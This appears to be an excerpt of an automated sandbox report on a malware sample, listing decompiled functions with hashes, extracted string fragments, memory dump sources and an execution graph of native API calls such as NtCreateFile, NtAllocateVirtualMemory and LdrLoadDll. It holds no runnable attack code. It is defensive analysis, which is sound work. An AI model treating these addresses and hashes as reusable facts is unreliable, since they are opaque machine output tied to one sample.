                                                                          • Opcode Fuzzy Hash: c4c309b435597d8eb73d16d26493d062dd72e3cbc1fd4db8b85e70acc7fddf22
                                                                          • Instruction Fuzzy Hash: 8601B1B0C40208AADF10EFA5D804ADFBBB9FF05354F00825DA814BB200E7B65609CFA1
                                                                          Function 02F929A8 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1$5$B$D$e$x
                                                                          • API String ID: 0-4059011928
                                                                          • Opcode ID: d27984da880420a792de0034f43c01268a0da3a06bfcf1e7c22221efa6fdfb3b
                                                                          • Instruction ID: 2391c4493f5daaa955385ae05c2f4a0fb532e60f5fd3c984edf36c75b0d53904
                                                                          • Opcode Fuzzy Hash: d27984da880420a792de0034f43c01268a0da3a06bfcf1e7c22221efa6fdfb3b
                                                                          • Instruction Fuzzy Hash: 1411AF20D0C7CAD9DF22C7BC84042AEBF715B13264F1883D9D9E46B2D2C2794655C7A6
                                                                          Function 02FA5998 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $i$l$o$u
                                                                          • API String ID: 0-2051669658
                                                                          • Opcode ID: 6a2cca70e04c31d5722fbf9e1ec61f5af89285625117f2145078c694e840ef0c
                                                                          • Instruction ID: 06a32425084b4859bf76633be2e99634efa21106bd31675fd49ef37757913a75
                                                                          • Opcode Fuzzy Hash: 6a2cca70e04c31d5722fbf9e1ec61f5af89285625117f2145078c694e840ef0c
                                                                          • Instruction Fuzzy Hash: 27612CF1E00304AFDB24DBA4CC90FEFB7F9AB88750F504559E61AA7240E775AA45CB60
                                                                          Function 02FA5995 Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $i$l$o$u
                                                                          • API String ID: 0-2051669658
                                                                          • Opcode ID: 2afdcf266c4767c80dfc2fa5595e37eb2b9516399987675b3c5750f77170fac9
                                                                          • Instruction ID: 305a6f66a193a157f19baed41b4cae73e74b86b8f363bd65fe0ae6e61e104750
                                                                          • Opcode Fuzzy Hash: 2afdcf266c4767c80dfc2fa5595e37eb2b9516399987675b3c5750f77170fac9
                                                                          • Instruction Fuzzy Hash: 824109B1E00308AFDB20DFA5CC94BEFBBF9AB88744F504559E619A7240D771AA45CB60
                                                                          Function 02FA17D8 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3$4$7$J$m
                                                                          • API String ID: 0-3476024030
                                                                          • Opcode ID: 7fad77ba2fe3d7ff689f173cb114a21df2a53897c7bd25fa40b17743e5724a60
                                                                          • Instruction ID: fe077f4857e12aa48d34dc31175d9662c5b87fdb341fce4defc3807cf1ae0539
                                                                          • Opcode Fuzzy Hash: 7fad77ba2fe3d7ff689f173cb114a21df2a53897c7bd25fa40b17743e5724a60
                                                                          • Instruction Fuzzy Hash: 0D3141B1E10208ABDF11DBA4CD51FFF73BDEF05344F008198EA08A6241E775AA058BE5
                                                                          Function 02FA5628 Relevance: 5.3, Strings: 4, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: 782b1a67db42bb892c7c71a133478816813fcd376b43122a8adb320027dec56c
                                                                          • Instruction ID: c5ab94b3e08b49d34627d0770610d673ed5a10fc997af5d23258be2489f90bf2
                                                                          • Opcode Fuzzy Hash: 782b1a67db42bb892c7c71a133478816813fcd376b43122a8adb320027dec56c
                                                                          • Instruction Fuzzy Hash: 33B11BB5A00708AFDB24DBA4CC94FEFB7BDAF88744F108558E619AB240D775AA41CB50
                                                                          Function 02FA5F68 Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$h$o
                                                                          • API String ID: 0-3662636641
                                                                          • Opcode ID: f599a660204109fab171151317fad2644bd24d2872713584d5b23ef02f6ebecb
                                                                          • Instruction ID: ee6af085d4a336e4a5d396b9e0827d8eac0f6d6500130be98c4938f12de2e3dd
                                                                          • Opcode Fuzzy Hash: f599a660204109fab171151317fad2644bd24d2872713584d5b23ef02f6ebecb
                                                                          • Instruction Fuzzy Hash: AD8183B2C4121E6ADB25EB95CD40FFFB37DEF48740F0085E9A609A6040EB745B858FA1
                                                                          Function 02FA5625 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: 65b86fed6b6f47c793bcc1f76f23872e8263db8a5d2c863bc53727437cc226d6
                                                                          • Instruction ID: c224f6607531a36ba9262c26b53bd8c2ec1dfad4e2420f287da54d9cca9a4e9d
                                                                          • Opcode Fuzzy Hash: 65b86fed6b6f47c793bcc1f76f23872e8263db8a5d2c863bc53727437cc226d6
                                                                          • Instruction Fuzzy Hash: 2D6141B5A00308AFDB24DFA4CC94FEFB7BDAF89744F504558E619AB240D771AA41CB50
                                                                          Function 02FA54E8 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                          • API String ID: 0-2877786613
                                                                          • Opcode ID: facecc15f5fd23e0f52b4383c1205e14cbafe598fd4cd33b7859023cb7fade8e
                                                                          • Instruction ID: 054029a8e690b6b1a5ec3779a2cad7409480322e76eedc4c0708426f050884ad
                                                                          • Opcode Fuzzy Hash: facecc15f5fd23e0f52b4383c1205e14cbafe598fd4cd33b7859023cb7fade8e
                                                                          • Instruction Fuzzy Hash: 9A412FB1A512187EEB02EB92CC41FEF777D9F59B40F404449FA04AA180E77466058BB6
                                                                          Function 02FA54E7 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                          • API String ID: 0-2877786613
                                                                          • Opcode ID: afab1569cd416dcbb5c80a7ce8b54549e5107bbab39ae5ab7738177157079282
                                                                          • Instruction ID: 72f05bbd7ba1479a6c591474a5b3cd0922f721c4847a4f460076cb8453cc5eae
                                                                          • Opcode Fuzzy Hash: afab1569cd416dcbb5c80a7ce8b54549e5107bbab39ae5ab7738177157079282
                                                                          • Instruction Fuzzy Hash: B5311FB1A512187AEB02EB92CC42FEF777D9F59B40F404449FA05BA280E77466058BB6
                                                                          Function 02FA5F62 Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$h$o
                                                                          • API String ID: 0-3662636641
                                                                          • Opcode ID: 290bc902b29789c6c53130b05c3af090c0b814b6fd09b6d1087ca75583e3c932
                                                                          • Instruction ID: 32b789f3c67d3a4bccfcef64e3565b071175a4e02bbc8c4c478a478e0e777ec7
                                                                          • Opcode Fuzzy Hash: 290bc902b29789c6c53130b05c3af090c0b814b6fd09b6d1087ca75583e3c932
                                                                          • Instruction Fuzzy Hash: 394181B1C4022EAADF21EB65CD41FEEB37DEF04340F0086E9A60DA6140EB745B858F95
                                                                          Function 02FA2BDD Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: 3888adc56c5331ad294f9841d7af71af9205f8041a7103d2d1c778ea256b37cf
                                                                          • Instruction ID: dc3189c70d6a7fbf4797ae65cfb4f92943420219005e63d32e497e4ce4e94e7e
                                                                          • Opcode Fuzzy Hash: 3888adc56c5331ad294f9841d7af71af9205f8041a7103d2d1c778ea256b37cf
                                                                          • Instruction Fuzzy Hash: 7B11C2B2900208ABDB14DF99DC85ADEF7B9FF04700F048259EA09AB202E771D945CFE0
                                                                          Function 02FA2BE8 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: 5ff759d5fd49fb8c0e0f955bdbd38ef0a7d6dec59307f7ae7495441d1f35fd3b
                                                                          • Instruction ID: 5a8245909c06b5d69f96e0842fcf0e2a22279e288d874c080434055a94af125d
                                                                          • Opcode Fuzzy Hash: 5ff759d5fd49fb8c0e0f955bdbd38ef0a7d6dec59307f7ae7495441d1f35fd3b
                                                                          • Instruction Fuzzy Hash: 3D0184B2900218ABDB14DF99DCC4ADEF7BDFF08714F048219EA19AB201E771D945CBA0

                                                                          Execution Graph

                                                                          Execution Coverage:1.5%
                                                                          Dynamic/Decrypted Code Coverage:5.6%
                                                                          Signature Coverage:0.9%
                                                                          Total number of Nodes:323
                                                                          Total number of Limit Nodes:52
                                                                          execution_graph 96932 28d28cc 96933 28d28d9 96932->96933 96935 28d2903 96933->96935 96936 28d63c0 96933->96936 96937 28d63f3 96936->96937 96938 28d6417 96937->96938 96943 28e9070 96937->96943 96938->96935 96941 28d643a 96941->96938 96947 28e9530 96941->96947 96942 28d64bc 96942->96935 96944 28e908d 96943->96944 96950 3372ca0 LdrInitializeThunk 96944->96950 96945 28e90b9 96945->96941 96948 28e954d 96947->96948 96949 28e955e NtClose 96948->96949 96949->96942 96950->96945 96952 28c9e40 96953 28c9e4f 96952->96953 96954 28c9e90 96953->96954 96955 28c9e7d CreateThread 96953->96955 96956 28d32df 96958 28d3276 96956->96958 96957 28d3298 96958->96957 96959 28e9530 NtClose 96958->96959 96959->96957 96962 28d6e90 96963 28d6eba 96962->96963 96966 28d8010 96963->96966 96965 28d6ee4 96967 28d802d 96966->96967 96973 28e8c30 96967->96973 96969 28d807d 96970 28d8084 96969->96970 96978 28e8d10 96969->96978 96970->96965 96972 28d80ad 96972->96965 96974 28e8cce 96973->96974 96975 28e8c5e 96973->96975 96983 3372f30 LdrInitializeThunk 96974->96983 96975->96969 96976 28e8d07 96976->96969 96979 28e8dc4 96978->96979 96981 28e8d42 96978->96981 96984 3372d10 LdrInitializeThunk 96979->96984 96980 28e8e09 96980->96972 96981->96972 96983->96976 96984->96980 96985 28d64d0 96986 28d64f5 96985->96986 96989 28e8e60 96986->96989 96990 28e8e7d 96989->96990 96993 3372c60 LdrInitializeThunk 96990->96993 96991 28d6569 96993->96991 96999 28e9210 97000 28e92c7 96999->97000 97002 28e923f 96999->97002 97001 28e92dd NtCreateFile 97000->97001 97003 28d326c 97008 28d7e60 97003->97008 97006 28d3298 97007 28e9530 NtClose 97007->97006 97009 28d7e7a 97008->97009 97013 28d327c 97008->97013 97014 28e8be0 97009->97014 97012 28e9530 NtClose 97012->97013 97013->97006 97013->97007 97015 28e8bfa 97014->97015 97018 33735c0 LdrInitializeThunk 97015->97018 97016 28d7f4a 97016->97012 97018->97016 97019 28d246e 97020 28d23fd 97019->97020 97021 28d247a 97019->97021 97026 28e8b40 97020->97026 97025 28d244b 97027 28e8b5d 97026->97027 97035 3372c0a 97027->97035 97028 28d2436 97030 28e95c0 97028->97030 97031 28e9652 97030->97031 97033 28e95ee 97030->97033 97038 3372e80 LdrInitializeThunk 97031->97038 97032 28e9683 97032->97025 97033->97025 97036 3372c11 97035->97036 97037 3372c1f LdrInitializeThunk 97035->97037 97036->97028 97037->97028 97038->97032 97039 3372ad0 LdrInitializeThunk 97040 28c9ea0 97043 28c9ef6 97040->97043 97041 28ca733 97043->97041 97044 28eb290 97043->97044 97045 28eb2b6 97044->97045 97050 28c4170 97045->97050 97047 28eb2c2 97048 28eb2fb 97047->97048 97053 28e5780 97047->97053 97048->97041 97052 28c417d 97050->97052 97057 28d3370 97050->97057 97052->97047 97054 28e57e1 97053->97054 97056 28e57ee 97054->97056 97074 28d1b20 97054->97074 97056->97048 97058 28d338d 97057->97058 97060 28d33a6 97058->97060 97061 28e9fa0 97058->97061 97060->97052 97063 28e9fba 97061->97063 97062 28e9fe9 97062->97060 97063->97062 97064 28e8b40 LdrInitializeThunk 97063->97064 97065 28ea049 97064->97065 97068 28eb630 97065->97068 97071 28e98a0 97068->97071 97070 28ea062 97070->97060 97072 28e98ba 97071->97072 97073 28e98cb RtlFreeHeap 97072->97073 97073->97070 97075 28d1b5b 97074->97075 97090 28d7f70 97075->97090 97077 28d1b63 97078 28d1e3d 97077->97078 97101 28eb710 97077->97101 97078->97056 97080 28d1b79 97081 28eb710 RtlAllocateHeap 97080->97081 97082 28d1b8a 97081->97082 97083 28eb710 RtlAllocateHeap 97082->97083 97085 28d1b9b 97083->97085 97089 28d1c3b 97085->97089 97112 28d6b20 NtClose LdrInitializeThunk LdrInitializeThunk 97085->97112 97087 28d1df2 97108 28e80c0 97087->97108 97104 28d4650 97089->97104 97091 28d7f9c 97090->97091 97092 28d7e60 2 API calls 97091->97092 97093 28d7fbf 97092->97093 97094 28d7fc9 97093->97094 97095 28d7fe1 97093->97095 97096 28d7fd4 97094->97096 97098 28e9530 NtClose 97094->97098 97097 28d7ffd 97095->97097 97099 28e9530 NtClose 97095->97099 97096->97077 97097->97077 97098->97096 97100 28d7ff3 97099->97100 97100->97077 97113 28e9850 97101->97113 97103 28eb72b 97103->97080 97106 28d4674 97104->97106 97105 28d46b0 LdrLoadDll 97105->97106 97106->97087 97106->97105 97107 28d467b 97106->97107 97107->97087 97109 28e8122 97108->97109 97111 28e812f 97109->97111 97116 28d1e50 97109->97116 97111->97078 97112->97089 97114 28e986d 97113->97114 97115 28e987e RtlAllocateHeap 97114->97115 97115->97103 97118 28d1e70 97116->97118 97134 28d8240 97116->97134 97126 28d23e3 97118->97126 97138 28e1260 97118->97138 97121 28d2095 97147 28ec800 97121->97147 97123 28d1ece 97123->97126 97142 28ec6d0 97123->97142 97126->97111 97127 28d20aa 97129 28d20fa 97127->97129 97153 28d0980 97127->97153 97129->97126 97130 28d0980 LdrInitializeThunk 97129->97130 97158 28d81e0 97129->97158 97162 28e59f0 13 API calls 97129->97162 97130->97129 97132 28d2250 97132->97129 97133 28d81e0 LdrInitializeThunk 97132->97133 97157 28e59f0 13 API calls 97132->97157 97133->97132 97135 28d824d 97134->97135 97136 28d826e SetErrorMode 97135->97136 97137 28d8275 97135->97137 97136->97137 97137->97118 97139 28e1267 97138->97139 97163 28eb5a0 97139->97163 97141 28e1281 97141->97123 97143 28ec6e6 97142->97143 97144 28ec6e0 97142->97144 97145 28eb710 RtlAllocateHeap 97143->97145 97144->97121 97146 28ec70c 97145->97146 97146->97121 97148 28ec770 97147->97148 97149 28ec7cd 97148->97149 97150 28eb710 RtlAllocateHeap 97148->97150 97149->97127 97151 28ec7aa 97150->97151 97152 28eb630 RtlFreeHeap 97151->97152 97152->97149 97154 28d099c 97153->97154 97170 28e97b0 97154->97170 97157->97132 97159 28d81f3 97158->97159 97160 28d821e 97159->97160 97175 28e8a40 97159->97175 97160->97129 97162->97129 97166 28e9690 97163->97166 97165 28eb5d1 97165->97141 97167 28e9725 97166->97167 97168 28e96bb 97166->97168 97169 28e973b NtAllocateVirtualMemory 97167->97169 97168->97165 97169->97165 97171 28e97ca 97170->97171 97174 3372c70 LdrInitializeThunk 97171->97174 97172 28d09a2 97172->97132 97174->97172 97176 28e8ac1 97175->97176 97177 28e8a6e 97175->97177 97180 3372dd0 LdrInitializeThunk 97176->97180 97177->97160 97178 28e8ae6 97178->97160 97180->97178 97181 28e18a0 97182 28e18bc 97181->97182 97183 28e18f8 97182->97183 97184 28e18e4 97182->97184 97185 28e9530 NtClose 97183->97185 97186 28e9530 NtClose 97184->97186 97187 28e1901 97185->97187 97188 28e18ed 97186->97188 97191 28eb750 RtlAllocateHeap 97187->97191 97190 28e190c 97191->97190 97197 28e5960 97198 28e59c2 97197->97198 97200 28e59cf 97198->97200 97201 28d7490 97198->97201 97202 28d7447 97201->97202 97204 28d7482 97202->97204 97205 28db370 97202->97205 97204->97200 97207 28db396 97205->97207 97206 28db5c9 97206->97204 97207->97206 97208 28ec800 2 API calls 97207->97208 97209 28db42b 97208->97209 97209->97206 97210 28db502 97209->97210 97212 28e8b40 LdrInitializeThunk 97209->97212 97211 28db521 97210->97211 97214 28d5c30 LdrInitializeThunk 97210->97214 97232 28e58b0 97211->97232 97215 28db48d 97212->97215 97214->97211 97215->97210 97216 28db496 97215->97216 97216->97206 97218 28db4c8 97216->97218 97227 28db4ea 97216->97227 97252 28d5c30 97216->97252 97217 28db54e 97219 28db5b1 97217->97219 97237 28e86b0 97217->97237 97255 28e4900 LdrInitializeThunk 97218->97255 97225 28d81e0 LdrInitializeThunk 97219->97225 97220 28d81e0 LdrInitializeThunk 97224 28db4f8 97220->97224 97224->97204 97228 28db5bf 97225->97228 97226 28db588 97242 28e8760 97226->97242 97227->97220 97228->97204 97230 28db5a2 97247 28e88c0 97230->97247 97233 28e5915 97232->97233 97234 28e5950 97233->97234 97256 28d5a00 97233->97256 97234->97217 97236 28e5932 97236->97217 97238 28e8730 97237->97238 97239 28e86de 97237->97239 97260 33739b0 LdrInitializeThunk 97238->97260 97239->97226 97240 28e8755 97240->97226 97243 28e87dd 97242->97243 97245 28e878b 97242->97245 97261 3374340 LdrInitializeThunk 97243->97261 97244 28e8802 97244->97230 97245->97230 97248 28e8940 97247->97248 97250 28e88ee 97247->97250 97262 3372fb0 LdrInitializeThunk 97248->97262 97249 28e8965 97249->97219 97250->97219 97253 28e8d10 LdrInitializeThunk 97252->97253 97254 28d5c6e 97252->97254 97253->97254 97254->97218 97255->97227 97257 28d599b 97256->97257 97259 28d59b7 97256->97259 97258 28d81e0 LdrInitializeThunk 97257->97258 97257->97259 97258->97257 97259->97236 97260->97240 97261->97244 97262->97249 97263 28e1421 97275 28e9380 97263->97275 97265 28e1475 97269 28e9530 NtClose 97265->97269 97266 28e1460 97268 28e9530 NtClose 97266->97268 97267 28e1442 97267->97265 97267->97266 97270 28e1469 97268->97270 97272 28e147e 97269->97272 97271 28e14b5 97272->97271 97273 28eb630 RtlFreeHeap 97272->97273 97274 28e14a9 97273->97274 97276 28e942a 97275->97276 97278 28e93ae 97275->97278 97277 28e9440 NtReadFile 97276->97277 97277->97267 97278->97267 97279 28e1bb9 97280 28e1bbf 97279->97280 97281 28e9530 NtClose 97280->97281 97283 28e1bc4 97280->97283 97282 28e1be9 97281->97282 97284 28d5cb0 97285 28d81e0 LdrInitializeThunk 97284->97285 97286 28d5ce0 97284->97286 97285->97286 97288 28d5d0c 97286->97288 97289 28d8160 97286->97289 97290 28d81a4 97289->97290 97295 28d81c5 97290->97295 97296 28e8810 97290->97296 97292 28d81b5 97293 28d81d1 97292->97293 97294 28e9530 NtClose 97292->97294 97293->97286 97294->97295 97295->97286 97297 28e888d 97296->97297 97299 28e883b 97296->97299 97301 3374650 LdrInitializeThunk 97297->97301 97298 28e88b2 97298->97292 97299->97292 97301->97298 97302 28d0ef0 97303 28d0f00 97302->97303 97304 28d4650 LdrLoadDll 97303->97304 97305 28d0f27 97304->97305 97306 28d0f73 97305->97306 97307 28d0f60 PostThreadMessageW 97305->97307 97307->97306 97308 28e61f0 97309 28e624a 97308->97309 97311 28e6257 97309->97311 97312 28e3c00 97309->97312 97313 28eb5a0 NtAllocateVirtualMemory 97312->97313 97315 28e3c41 97312->97315 97313->97315 97314 28e3d4e 97314->97311 97315->97314 97316 28d4650 LdrLoadDll 97315->97316 97318 28e3c87 97316->97318 97317 28e3cd0 Sleep 97317->97318 97318->97314 97318->97317 97319 28e8af0 97320 28e8b0d 97319->97320 97323 3372df0 LdrInitializeThunk 97320->97323 97321 28e8b35 97323->97321 97324 28e1c30 97329 28e1c49 97324->97329 97325 28e1cd9 97326 28e1c91 97327 28eb630 RtlFreeHeap 97326->97327 97328 28e1ca1 97327->97328 97329->97325 97329->97326 97330 28e1cd4 97329->97330 97331 28eb630 RtlFreeHeap 97330->97331 97331->97325 97332 28ec730 97333 28eb630 RtlFreeHeap 97332->97333 97334 28ec745 97333->97334 97335 28e8970 97336 28e8a02 97335->97336 97338 28e899e 97335->97338 97340 3372ee0 LdrInitializeThunk 97336->97340 97337 28e8a33 97340->97337

                                                                          Executed Functions

                                                                          Function 028C9EA0 Relevance: 44.2, Strings: 35, Instructions: 470COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 28c9ea0-28ca271 2 28ca27b-28ca285 0->2 3 28ca2be-28ca2d3 2->3 4 28ca287-28ca2a2 2->4 5 28ca2de-28ca2e5 3->5 6 28ca2a9-28ca2ab 4->6 7 28ca2a4-28ca2a8 4->7 8 28ca2e7-28ca30e 5->8 9 28ca310-28ca31a 5->9 10 28ca2bc 6->10 11 28ca2ad-28ca2b6 6->11 7->6 8->5 12 28ca32b-28ca337 9->12 10->2 11->10 14 28ca339-28ca343 12->14 15 28ca345 12->15 14->12 16 28ca34c-28ca356 15->16 18 28ca358-28ca377 16->18 19 28ca38a-28ca394 16->19 20 28ca388 18->20 21 28ca379-28ca382 18->21 22 28ca3a5-28ca3b1 19->22 20->16 21->20 23 28ca3c9-28ca3d2 22->23 24 28ca3b3-28ca3bc 22->24 25 28ca3d8-28ca3e2 23->25 26 28ca6aa-28ca6b4 23->26 27 28ca3be-28ca3c4 24->27 28 28ca3c7 24->28 31 28ca3f3-28ca3ff 25->31 29 28ca6c5-28ca6d1 26->29 27->28 28->22 32 28ca6e1-28ca6e8 29->32 33 28ca6d3-28ca6df 29->33 34 28ca417-28ca42a 31->34 35 28ca401-28ca40a 31->35 36 28ca6ea-28ca6f4 32->36 37 28ca733-28ca73d 32->37 33->29 41 28ca43b-28ca447 34->41 39 28ca40c-28ca412 35->39 40 28ca415 35->40 42 28ca705-28ca70e 36->42 46 28ca73f-28ca75e 37->46 47 28ca789-28ca793 37->47 39->40 40->31 44 28ca45d-28ca467 41->44 45 28ca449-28ca45b 41->45 49 28ca71e-28ca722 42->49 50 28ca710-28ca71c 42->50 51 28ca478-28ca484 44->51 45->41 53 28ca770-28ca781 46->53 54 28ca760-28ca76e 46->54 48 28ca7a4-28ca7b0 47->48 56 28ca7c0-28ca7c7 48->56 57 28ca7b2-28ca7be 48->57 59 28ca72e call 28eb290 49->59 60 28ca724-28ca72b 49->60 50->42 61 28ca486-28ca48f 51->61 62 28ca491-28ca49b 51->62 55 28ca787 53->55 54->55 55->37 65 28ca7ec-28ca7f3 56->65 66 28ca7c9-28ca7df 56->66 57->48 59->37 60->59 61->51 63 28ca4ac-28ca4b8 62->63 69 28ca4ba-28ca4c9 63->69 70 28ca4cb-28ca4da 63->70 73 28ca825-28ca82e 65->73 74 28ca7f5-28ca823 65->74 71 28ca7ea 66->71 72 28ca7e1-28ca7e7 66->72 69->63 75 28ca4e0-28ca4ea 70->75 76 28ca633-28ca639 70->76 71->56 72->71 74->65 78 28ca4fb-28ca507 75->78 79 28ca63d-28ca644 76->79 80 28ca509-28ca515 78->80 81 28ca525-28ca52f 78->81 82 28ca646-28ca675 79->82 83 28ca677-28ca67e 79->83 84 28ca517-28ca51d 80->84 85 28ca523 80->85 86 28ca540-28ca54a 81->86 82->79 87 28ca6a5 83->87 88 28ca680-28ca6a3 83->88 84->85 85->78 90 28ca54c-28ca582 86->90 91 28ca584-28ca58b 86->91 87->23 88->83 90->86 92 28ca58d-28ca5b1 91->92 93 28ca5d8-28ca5dc 91->93 95 28ca5c2-28ca5d6 92->95 96 28ca5b3-28ca5bc 92->96 97 28ca5de-28ca5f5 93->97 98 28ca5f7-28ca601 93->98 95->91 96->95 97->93 99 28ca612-28ca61b 98->99 100 28ca61d-28ca62f 99->100 101 28ca631 99->101 100->99 101->26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ~$#$'$($*s$7p$@$D$Ey$F$J$K$O$S@$S@$W\$X($\V$]$_;$h#$hr$o$v $vy$x$x$z${P$|$+$:$Z$j$q
                                                                          • API String ID: 0-4078000664
                                                                          • Opcode ID: e2694413127f3f163cb1071dfdf21176de8339634fa82c0befc09d5c22b5d3a8
                                                                          • Instruction ID: b7b2517c9fec691147c2632565e75fb07ab29a72709e91537605cd9c7618a3c7
                                                                          • Opcode Fuzzy Hash: e2694413127f3f163cb1071dfdf21176de8339634fa82c0befc09d5c22b5d3a8
                                                                          • Instruction Fuzzy Hash: 584294B8D0526CCBEB28CF54C9947DDBBB2BB45308F2085D9C50ABB285C7799A85CF41
                                                                          Function 028E9210 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,5F8FFFB0,?,?,?,?,?,?,?,?,?), ref: 028E930E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
